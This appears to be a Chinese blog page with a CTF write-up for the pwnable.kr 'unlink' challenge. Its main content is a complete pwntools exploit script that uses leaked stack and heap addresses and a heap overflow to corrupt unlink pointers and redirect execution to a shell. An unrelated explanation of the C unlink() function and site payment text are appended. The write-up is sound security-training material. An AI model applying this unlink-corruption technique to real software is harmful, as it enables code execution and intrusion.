pwnable之unlink

问题分析

程序自己写了一个实现unlink的程序,没有任何check,并且存在堆溢出

经典的unlink attack,这里就不介绍了。

//unlink
bk_chunk = p->bk
fd_chunk = p->fd
bk_chunk->fd = fd_chunk
fd_chunk->bk = bk_chunk

solv.py

from pwn import *
context.log_level = 'debug'
context.arch = 'i386'
cn = ssh(host='pwnable.kr',port=2222,user='unlink',password='guest')
p = cn.process('./unlink')
elf = ELF('unlink')
shell_addr = elf.symbols['shell']
#gdb.attach(p,'b unlink\n')
p.recvuntil('here is stack address leak: ')
stack_leak = p.recvuntil('\n')[:-1]
p.recvuntil('here is heap address leak: ')
heap_leak =  p.recvuntil('\n')[:-1]
stack_leak = int(stack_leak,16)
heap_leak = int(heap_leak,16)
log.info("stack leak {}".format(hex(stack_leak)))
log.info("heap leak {}".format(hex(heap_leak)))
stack2_addr = stack_leak + 0x14 - 0x8
heap2_addr = heap_leak + 0xc

payload = p32(shell_addr) + 'aaaa' * 3 +  p32(stack2_addr) + p32(heap2_addr) 
#raw_input('send payload')
p.sendline(payload)
p.interactive()
03-26
### unlink 函数或命令的用法 #### 在编程中的 `unlink` 函数 在 C 编程中,`unlink` 是一个标准库函数,用于删除指定路径下的文件。其定义如下: ```c #include <unistd.h> int unlink(const char *pathname); ``` 该函数接受一个参数 `pathname`,表示要删除的目标文件路径。如果成功执行,则返回值为 0;否则返回 -1 并设置全局变量 `errno` 来指示错误原因。 需要注意的是,`unlink` 只能移除文件,而无法直接删除目录。对于目录的操作应使用 `rmdir` 或其他方法完成[^2]。 下面是一个简单的例子展示如何调用此函数: ```c #include <stdio.h> #include <stdlib.h> #include <unistd.h> int main() { const char* filename = "testfile.txt"; if (unlink(filename) == -1){ perror("Error deleting file"); exit(EXIT_FAILURE); } printf("%s has been successfully deleted.\n", filename); return EXIT_SUCCESS; } ``` #### 在操作系统层面的 `unlink` 命令 除了作为 API 存在于程序开发中外,在 Linux/Unix 的 shell 中也有对应的命令叫做 `unlink`。它同样用来删除单个硬链接或者普通文件(注意不是软连接)。语法形式非常简单: ```bash unlink TARGET_FILE_NAME ``` 例如,假设当前工作目录下存在名为 example.log 的日志文档,那么可以通过运行以下指令将其清除掉: ```bash unlink example.log ``` 不过值得注意的一点区别就是 Shell 版本不支持传递选项标志给定行为模式改变等功能扩展[^4]。 #### 总结说明 无论是通过代码实现还是手动操作终端界面来运用这两个工具都能达到相同的目的——即销毁特定实体对象于存储介质之上。但是它们各自适用场景有所不同:前者更多应用于自动化脚本编写当中以便动态管理资源生命周期;后者则偏向日常维护任务处理方面更为便捷直观一些[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值